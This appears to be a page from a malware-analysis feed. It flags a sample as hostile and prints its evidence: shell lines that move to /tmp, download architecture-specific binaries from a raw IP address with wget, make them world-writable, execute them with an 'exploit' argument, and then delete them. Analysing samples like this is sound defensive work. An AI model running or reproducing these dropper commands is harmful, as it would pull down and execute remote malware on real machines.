Hostile 100% Download

0a9c5f0aef7d76914e2041d07449df3d5013f6be94c3e53a10a44cb22b2c3ba7.unknown

Downloads and executes remote exploits

Raw-IP wget world-writable fetch executeRepeated raw-IP payload download chmod execution
SHA-2560a9c5f0aef7d76914e2041d07449df3d5013f6be94c3e53a10a44cb22b2c3ba7

Evidence

Curl/wget command targets an IPv4 URL lines 1–7
1cd /tmp;rm -rf splmips;wget http://213.209.143.25/splmips; chmod 777 splmips;./splmips exploit;rm -rf splmips
2cd /tmp;rm -rf splmpsl;wget http://213.209.143.25/splmpsl; chmod 777 splmpsl;./splmpsl exploit;rm -rf splmpsl
3cd /tmp;rm -rf splarm;wget http://213.209.143.25/splarm; chmod 777 splarm;./splarm exploit;rm -rf splarm
4cd /tmp;rm -rf splarm5;wget http://213.209.143.25/splarm5; chmod 777 splarm5;./splarm5 exploit;rm -rf splarm5
5cd /tmp;rm -rf splarm6;wget http://213.209.143.25/splarm6; chmod 777 splarm6;./splarm6 exploit;rm -rf splarm6
6cd /tmp;rm -rf splarm7;wget http://213.209.143.25/splarm7; chmod 777 splarm7;./splarm7 exploit;rm -rf splarm7
7cd /tmp;rm -rf buf

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.